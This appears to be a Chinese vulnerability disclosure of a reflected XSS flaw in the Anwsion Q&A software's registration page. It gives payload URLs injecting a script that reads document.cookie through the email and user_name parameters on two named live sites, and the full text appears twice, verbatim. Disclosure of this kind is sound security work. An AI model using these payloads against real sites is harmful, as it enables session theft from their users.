### 简要描述: anwsion通杀反射XSS缺陷一枚。 为了www.3hack.com的安全 修复吧。 ### 详细说明: ``` http://www.3hack.com/?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C ``` ``` http://wenda.anwsion.com/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg ``` 参数不只是这个如: ``` http://wenda.anwsion.com/account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201211/30182001a235f4572e245fe7b3f45813c10edb02.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/30182001a235f4572e245fe7b3f45813c10edb02.jpg) 注册地方所以参数的 ``` name-{XSS code} ```
### 简要描述: anwsion通杀反射XSS缺陷一枚。 为了www.3hack.com的安全 修复吧。 ### 详细说明: ``` http://www.3hack.com/?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C ``` ``` http://wenda.anwsion.com/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg ``` 参数不只是这个如: ``` http://wenda.anwsion.com/account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201211/30182001a235f4572e245fe7b3f45813c10edb02.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/30182001a235f4572e245fe7b3f45813c10edb02.jpg) 注册地方所以参数的 ``` name-{XSS code} ```